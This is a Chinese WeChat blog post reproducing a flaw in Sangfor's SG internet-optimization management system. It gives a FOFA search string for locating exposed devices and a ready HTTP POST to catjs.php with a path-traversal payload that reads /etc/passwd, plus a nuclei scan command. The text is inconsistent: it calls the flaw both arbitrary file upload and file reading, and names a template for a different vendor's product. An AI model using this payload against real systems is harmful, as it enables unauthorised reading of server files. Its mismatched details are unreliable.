点击上方蓝字关注我们
BEGINNING OF SPRING
0x01
阅读须知
Reading Instructions
数字人才创研院秉承探究学习与交流的理念,一切从降低已有潜在威胁出发,所有发布的技术文章仅供参考,未经授权请勿利用文章中的技术内容对任何计算机系统进行入侵操作,否则对他人或单位而造成的直接或间接后果和损失,均由使用者本人负责。
0x02
漏洞概述
Vulnerability Overview
深信服科技股份有限公司是一家专注于企业级网络安全、云计算、IT基础设施与物联网的产品和服务供应商,拥有深信服智安全、信服云两大业务品牌,与子公司信锐技术,致力于承载各行业用户数字化转型过程中的基石性工作,从而让每个用户的数字化更简单、更安全。
深信服SG上网优化管理系统 catjs.php存在任意文件上传漏洞,未经授权的攻击者通过漏洞可以上传任意文件,获取服务器权限。
(文章仅限技术交流,禁止非授权操作!)
0x03
漏洞复现
Vulnerability Recurrence
fofa:title="SANGFOR上网优化管理"
1.执行如下语句上传txt文档,并访问该txt文件。
POST /php/catjs.php HTTP/1.1
Host: {Hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 35
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
["../../../../../../../etc/passwd"]
其中Hostname为目标漏洞平台的实际地址或域名
2.访问目标漏洞资产,得到内容“敏感信息”
(文章仅限技术交流,禁止非授权操作!)
0x04
漏洞脚本
Vulnerability script
1.Nuclei验证脚本命令使用如下:
nuclei.exe -t wangshen-secgate-objappupfile-fileupload.yaml -l wangshen-secgate-objappupfile-fileupload_Subs.txt
--------------------------------------------
wangshen-secgate-objappupfile-fileupload_Subs.txt可以结合实际情况自定义
--------------------------------------------
2.空间指纹截图如下:
3.关注公众号并回复:深信服SG,即可获取脚本。
(文章仅限技术交流,禁止非授权操作!)
0x05
修复建议
Repair Suggestions
1.实施产品的权限访问控制,降低互联网搜索引擎的查询。
2.加强后台认证要求(如AAAA策略等),提高口令的安全性。
3.增强关键页面的安全性,提升WEB后台的安全访问控制权限能力。
往期推荐 · 值得阅看
点亮「星标」,让我们不再错过~
2023-10-11
漏洞复现|网神SecGate3600防火墙存在任意文件上传漏洞
2023-09-28
漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞
2023-09-20
漏洞复现|某VPN存在未授权管理用户遍历+任意账号密码修改漏洞
2023-08-15
PHPMyadmin的Getshell方法汇总
2023-07-01
漏洞复现|北京网康 NS-ASG安全网关存在远程命令执行漏洞
2023-06-19
END
原文始发于微信公众号(数字人才创研院):漏洞复现|深信服SG上网优化管理系统存在文件读取漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论